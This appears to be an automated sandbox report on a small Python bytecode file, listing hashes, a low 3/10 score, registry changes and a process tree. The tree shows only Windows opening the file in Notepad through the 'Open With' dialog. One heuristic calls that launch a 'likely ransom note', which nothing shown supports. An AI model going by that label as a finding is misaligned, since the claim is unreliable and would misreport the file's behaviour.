Analysis
-
max time kernel
43s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
19-06-2024 09:04
Behavioral task
behavioral1
Sample
cch_blum_re.pyc
Resource
win7-20240508-en
5 signatures
60 seconds
Behavioral task
behavioral2
Sample
cch_blum_re.pyc
Resource
win10v2004-20240508-en
11 signatures
60 seconds
General
-
Target
cch_blum_re.pyc
-
Size
7KB
-
MD5
b3b9b54ddc84df18135852ee3ede2383
-
SHA1
6841a45353951cbbb8a9bb7a8489a1ab43ce4669
-
SHA256
b8e5ae90d66993923b851d0aeb26c0031b56f46a7151d71a0fee2b77bd9bf691
-
SHA512
86db3c0eba1533bbe3ca62c324106e199756c09aa5477ab90c0711c28cc01fade9f87f89ebba78117102775194b0a197f95f93c95a8e5ec7c3a0295d494dee68
-
SSDEEP
192:8w5Cpjqg1Bo123UpK/PIFwH7GSPFy0xg60GeA:sWmK23UpK/P/bG8aA
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 12 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.pyc rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\edit\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\ rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.pyc\ = "pyc_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\edit rundll32.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2684 NOTEPAD.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
rundll32.exepid process 2696 rundll32.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exerundll32.exedescription pid process target process PID 2408 wrote to memory of 2696 2408 cmd.exe rundll32.exe PID 2408 wrote to memory of 2696 2408 cmd.exe rundll32.exe PID 2408 wrote to memory of 2696 2408 cmd.exe rundll32.exe PID 2696 wrote to memory of 2684 2696 rundll32.exe NOTEPAD.EXE PID 2696 wrote to memory of 2684 2696 rundll32.exe NOTEPAD.EXE PID 2696 wrote to memory of 2684 2696 rundll32.exe NOTEPAD.EXE
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\cch_blum_re.pyc1⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cch_blum_re.pyc2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\cch_blum_re.pyc3⤵
- Opens file in notepad (likely ransom note)
PID:2684